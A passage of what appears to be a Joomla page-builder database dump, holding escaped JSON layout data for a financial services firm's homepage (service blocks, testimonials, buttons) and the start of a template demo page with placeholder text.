Services\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"image02 blockzoom\\\"><div class=\\\"blockinner\\\"><div class=\\\"blocktitle\\\">INVESTMENTS</div><div class=\\\"blocktext\\\">It’s never too early to start planning for your retirement. We have an honest, clear approach to help you understand how to be smart with your money and make your retirement the ultimate vacation.</div><div class=\\\"blockbutton\\\"><a href=\\\"index.php/smith-and-smith-personal-solutions\\\" data-mce-href=\\\"index.php/smith-and-smith-personal-solutions\\\">Read More</a><br data-mce-bogus=\\\"1\\\"></div></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{\"class\":\"\",\"animationdelay\":2000,\"animationduration\":3000,\"animation\":\"fadeIn\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"id\":1487756083,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756084,\"settings\":{\"admin_label\":\"3 Panel Services\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"image03 blockzoom\\\"><div class=\\\"blockinner\\\"><div class=\\\"blocktitle\\\">HEALTHCARE</div><div class=\\\"blocktext\\\">Get the best in healthcare for you, your family or your employees with benefit plans from leading health insurance and medical aid companies.</div><div class=\\\"blockbutton\\\"><a href=\\\"index.php/smith-and-smith-personal-solutions\\\" data-mce-href=\\\"index.php/smith-and-smith-personal-solutions\\\">Read More</a><br data-mce-bogus=\\\"1\\\"></div></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,8\",\"settings\":{\"title_fontweight\":\"\",\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"id\":1487756085,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeIn\",\"animationduration\":1000,\"animationdelay\":300,\"class\":\"\"},\"id\":1487756086,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1487756087,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/smith-and-smith-images-about-us.jpg\",\"alt_text\":\"Healthcare, short-term insurance, investment planning and life assurance from Smith & Smith\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-8\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":1000,\"animation\":\"fadeIn\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"id\":1487756088,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756089,\"settings\":{\"admin_label\":\"About us\",\"title\":\"Welcome to Smith & Smith\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"Smith & Smith is a registered financial services provider with the Financial Services Board and supports the initiative on accreditation of financial advisors.<br><br>With knowledge and experience in all the financial disciplines – from healthcare to short-term insurance, investment planning and life assurance – we deal with corporates as well as individuals.<br><br>Smith & Smith has followed the guiding principle of personal service by helping individual investors, companies and families reach their financial goals.\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"inner_row\",\"layout\":\"4,4,4\",\"disable\":false,\"settings\":{\"fullscreen\":0,\"margin\":\"15px 0\",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"id\":1487756090,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1487756091,\"addons\":[{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1487756092,\"settings\":{\"admin_label\":\"Read more\",\"text\":\"Meet the Team\",\"url\":\"index.php/about-smith-and-smith-financial-solutions\",\"size\":\"\",\"type\":\"default\",\"icon\":\"\",\"target\":\"\",\"block\":\"sppb-btn-block\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756092\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-text-left\\\"><a href=\\\"index.php/about-smith-and-smith-financial-solutions\\\" id=\\\"btn-1487756092\\\" class=\\\"sppb-btn sppb-btn-default sppb-btn-block sppb-btn-rounded\\\">Meet the Team</a></div></div>\",\"assets\":[]},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1487756093,\"settings\":{\"admin_label\":\"\",\"gap\":\"20\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756093\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-empty-space clearfix\\\"></div></div>\",\"assets\":{\"css\":\"#sppb-addon-1487756093 .sppb-empty-space {padding-bottom: 20px;}\"}}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1487756094,\"addons\":[{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1487756095,\"settings\":{\"admin_label\":\"Brochure\",\"text\":\"Financial Informer (PDF)\",\"alignment\":\"sppb-text-left\",\"fontstyle\":null,\"letterspace\":\"0\",\"url\":\"\",\"target\":\"_blank\",\"type\":\"default\",\"appearance\":\"\",\"background_color\":\"#444444\",\"color\":\"#ffffff\",\"background_color_hover\":\"#222222\",\"color_hover\":\"#ffffff\",\"button_padding\":\"\",\"size\":\"\",\"shape\":\"rounded\",\"block\":\"sppb-btn-block\",\"icon\":\"fa-file-pdf-o\",\"icon_position\":\"left\",\"class\":\"\",\"global_options\":\"\",\"global_text_color\":\"\",\"global_link_color\":\"\",\"global_link_hover_color\":\"\",\"global_use_background\":\"0\",\"global_background_color\":\"\",\"global_background_image\":\"\",\"global_background_repeat\":\"no-repeat\",\"global_background_size\":\"cover\",\"global_background_attachment\":\"inherit\",\"global_user_border\":\"0\",\"global_border_width\":\"\",\"global_border_color\":\"\",\"global_boder_style\":\"none\",\"global_border_radius\":\"\",\"global_margin\":\"\",\"global_padding\":\"\",\"global_boxshadow\":\"\",\"global_use_animation\":\"0\",\"global_animation\":\"\",\"global_animationduration\":\"300\",\"global_animationdelay\":\"0\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"acl\":null,\"icon_margin\":{\"md\":\" \",\"sm\":\" \",\"xs\":\" \"}},\"visibility\":true,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756095\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-text-left\\\"><a href=\\\"media/attachments/2017/08/02/smith-and-smith-financial-informer.pdf\\\" id=\\\"btn-1487756095\\\" class=\\\"sppb-btn sppb-btn-default sppb-btn-block sppb-btn-rounded\\\"><i class=\\\"fa fa-file-pdf-o\\\"></i> Financial Informer (PDF)</a></div></div>\",\"assets\":[]},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1487756096,\"settings\":{\"admin_label\":\"\",\"gap\":\"20\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":false,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756096\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-empty-space clearfix\\\"></div></div>\",\"assets\":{\"css\":\"#sppb-addon-1487756096 .sppb-empty-space {padding-bottom: 20px;}\"}}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1487756097,\"addons\":[{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1487756098,\"settings\":{\"admin_label\":\"Contact us\",\"text\":\"Contact Us\",\"url\":\"index.php/contact\",\"size\":\"\",\"type\":\"danger\",\"icon\":\"\",\"target\":\"\",\"block\":\"sppb-btn-block\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756098\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-text-left\\\"><a href=\\\"index.php/contact\\\" id=\\\"btn-1487756098\\\" class=\\\"sppb-btn sppb-btn-danger sppb-btn-block sppb-btn-rounded\\\">Contact Us</a></div></div>\",\"assets\":[]}],\"visibility\":1}]}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"1,5,5,1\",\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#f5f5f5\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"25px 0\",\"margin\":\"25px 0\",\"fullscreen\":0,\"title_fontweight\":\"\"},\"id\":1487756099,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-1\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":300,\"animation\":\"fadeIn\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"id\":1487756100,\"addons\":[],\"visibility\":1},{\"class_name\":\"col-sm-5\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeIn\",\"animationduration\":300,\"animationdelay\":450,\"class\":\"\"},\"id\":1487756101,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756102,\"settings\":{\"admin_label\":\"Testimonial\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"testimonials\\\"><div class=\\\"testimonials-text\\\">“we have used the services of Smith & Smith for all our group pension, life and medical aid schemes. Our relationship started 7 years ago and today is stronger than ever before.\\\"</div><div class=\\\"testimonials-name\\\">Carl - Motor dealer</div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-5\",\"settings\":{},\"id\":1487756103,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756104,\"settings\":{\"admin_label\":\"Testimonial\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"testimonials\\\"><div class=\\\"testimonials-text\\\">“Smith & Smith have been with us every step of the way. Their service has been impeccable and their advice, invaluable. They are our perfect finacial partners.”</div><div class=\\\"testimonials-name\\\">Geoff & Alice Stevens</div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-1\",\"settings\":{},\"id\":1487756105,\"addons\":[],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,8\",\"settings\":{\"title_position\":\"sppb-text-left\",\"heading_selector\":\"h1\",\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"id\":1487756106,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeIn\",\"animationduration\":1000,\"animationdelay\":300,\"class\":\"hidden-xs\"},\"id\":1487756107,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1487756108,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/smith-and-smith-images-personal-solutions.jpg\",\"alt_text\":\"Plan your financial future with Smith & Smith\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-8\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeIn\",\"animationduration\":1000,\"animationdelay\":300,\"class\":\"\"},\"id\":1487756109,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756110,\"settings\":{\"admin_label\":\"Personal Solutions\",\"title\":\"Personal Solutions\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>Smith & Smith provides personal solutions covering everything that is required for you to live your life without having to worry about the “what ifs”. With our easy-to-understand approach, we offer complete solutions that fit your individual needs and circumstances.</p><p>We regularly take clients’ portfolios under review to ensure that premiums and products are market-related and that assets are insured at true market value.<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"inner_row\",\"layout\":\"4,4,4\",\"disable\":false,\"settings\":{},\"id\":1487756111,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"class\":\"services-block\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"id\":1487756112,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756113,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Life assurance<br>- Indemnity insurance<br>- Domestic short-term insurance<br>- Vehicle insurance</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756113\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-addon sppb-addon-text-block sppb-text-left \\\"><div class=\\\"sppb-addon-content\\\"><p>- Life assurance<br>- Indemnity insurance<br>- Domestic short-term insurance<br>- Vehicle insurance</p></div></div></div>\",\"assets\":[]}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1487756114,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756115,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Investments<br>- Retirement planning<br>- Drafting of legal agreements,<br>e.g. buy & sell agreements<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756115\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-addon sppb-addon-text-block sppb-text-left services-block\\\"><div class=\\\"sppb-addon-content\\\"><p>- Investments<br>- Retirement planning<br>- Drafting of legal agreements,<br>e.g. buy & sell agreements<br></p></div></div></div>\",\"assets\":[]}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1487756116,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756117,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Healthcare for individuals & families<br>- Corporate Wellness<br>- Funeral Cover<br>- Wills<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756117\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-addon sppb-addon-text-block sppb-text-left services-block\\\"><div class=\\\"sppb-addon-content\\\"><p>- Healthcare for individuals & families<br>- Corporate Wellness<br>- Funeral Cover<br>- Wills<br></p></div></div></div>\",\"assets\":[]},{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1487756118,\"settings\":{\"admin_label\":\"Read More\",\"text\":\"Read More\",\"url\":\"index.php/smith-and-smith-personal-solutions\",\"size\":\"\",\"type\":\"default\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756118\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-text-left\\\"><a href=\\\"index.php/smith-and-smith-personal-solutions\\\" id=\\\"btn-1487756118\\\" class=\\\"sppb-btn sppb-btn-default sppb-btn-rounded\\\">Read More</a></div></div>\",\"assets\":[]}],\"visibility\":1}]}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,8\",\"settings\":{\"title_position\":\"sppb-text-left\",\"heading_selector\":\"h1\",\"fullscreen\":0,\"margin\":\"0 0 25px 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"id\":1487756119,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-8 active-column-parent\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeIn\",\"animationduration\":1000,\"animationdelay\":300,\"class\":\"\"},\"id\":1487756120,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756121,\"settings\":{\"admin_label\":\"Corporate Solutions\",\"title\":\"Corporate Solutions\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>Owning your own business comes with many unique responsibilities, risks and investment opportunities. We offer comprehensive business insurance products as well as affordable group healthcare coverage and investment solutions that suit your enterprise’s specific requirements.<br><br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"inner_row\",\"layout\":\"4,4,4\",\"disable\":false,\"settings\":{},\"id\":1487756122,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"services-block\"},\"id\":1487756123,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756124,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Commercial short-term insurance<br>- Group healthcare<br>- Employee benefits<br>e.g. pension and provident funds</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756124\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-addon sppb-addon-text-block sppb-text-left \\\"><div class=\\\"sppb-addon-content\\\"><p>- Commercial short-term insurance<br>- Group healthcare<br>- Employee benefits<br>e.g. pension and provident funds</p></div></div></div>\",\"assets\":[]}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1487756125,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756126,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Investment solutions & advice<br>- Risk management<br>- Retirement solutions<br>- Finance planning<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756126\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-addon sppb-addon-text-block sppb-text-left services-block\\\"><div class=\\\"sppb-addon-content\\\"><p>- Investment solutions & advice<br>- Risk management<br>- Retirement solutions<br>- Finance planning<br></p></div></div></div>\",\"assets\":[]}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1487756127,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756128,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>- Business consulting (fee-based)<br>- Drafting of legal agreements<br>e.g. buy & sell agreements and shareholder agreements<br></p>\",\"alignment\":\"sppb-text-left\",\"class\":\"services-block\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756128\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-addon sppb-addon-text-block sppb-text-left services-block\\\"><div class=\\\"sppb-addon-content\\\"><p>- Business consulting (fee-based)<br>- Drafting of legal agreements<br>e.g. buy & sell agreements and shareholder agreements<br></p></div></div></div>\",\"assets\":[]},{\"type\":\"general\",\"name\":\"button\",\"title\":\"Button\",\"id\":1487756129,\"settings\":{\"admin_label\":\"Read More\",\"text\":\"Read More\",\"url\":\"index.php/smith-and-smith-corporate-solutions\",\"size\":\"\",\"type\":\"default\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"visibility\":1,\"htmlContent\":\"<div id=\\\"sppb-addon-1487756129\\\" class=\\\"clearfix\\\" ><div class=\\\"sppb-text-left\\\"><a href=\\\"index.php/smith-and-smith-corporate-solutions\\\" id=\\\"btn-1487756129\\\" class=\\\"sppb-btn sppb-btn-default sppb-btn-rounded\\\">Read More</a></div></div>\",\"assets\":[]}],\"visibility\":1}]}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeIn\",\"animationduration\":1000,\"animationdelay\":300,\"class\":\"hidden-xs\"},\"id\":1487756130,\"addons\":[{\"type\":\"content\",\"name\":\"image\",\"title\":\"Image\",\"id\":1487756131,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/smith-and-smith-images-commercial.jpg\",\"alt_text\":\"Financial planning by Smith & Smith\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\",\"open_lightbox\":0},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"}]','com_sppagebuilder','page',0,0,1,0,1,0,'2015-01-21 19:12:35',309,'2021-10-13 08:19:25',309,0,'0000-00-00 00:00:00','[]','Smith and Smith - Registered financial services provider','images/smith-and-smith-logo.png','Smith & Smith is a registered financial services provider with the Financial Services Board and supports the initiative on accreditation of financial advisors.','*',261006,''),(2,0,'Corporate','[{\"type\":\"sp_row\",\"layout\":\"66\",\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"images/slider.jpg\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"10px 0 0\",\"margin\":\"\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-6\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInLeftBig\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"100\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Clean and Unique Free Joomla Template\",\"heading_selector\":\"h3\",\"title_fontsize\":\"48\",\"title_fontweight\":\"\",\"title_text_color\":\"#333333\",\"title_position\":\"before\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"\",\"icon_size\":\"\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Lorem ipsum dolor sit amet consectetur adipisicing elit sed do eiusmod temporconsectetur adipisicing elit sed do.\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Download Now!\",\"url\":\"http://www.joomshaper.com/helix\",\"size\":\"lg\",\"type\":\"primary\",\"icon\":\"\",\"target\":\"_blank\",\"block\":\"\",\"margin\":\"30px 0 0\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-6\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":300,\"animation\":\"fadeInRightBig\",\"padding\":\"\",\"color\":\"\",\"background\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/slide1.png\",\"position\":\"sppb-text-center\",\"link\":\"http://\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"Our Services\",\"heading_selector\":\"h2\",\"title_fontsize\":36,\"title_text_color\":\"\",\"title_margin_top\":0,\"title_margin_bottom\":20,\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"#f5f5f5\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0px\",\"margin\":\"0px \",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"sortableitem\":\"[object Object]\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":100,\"class\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully 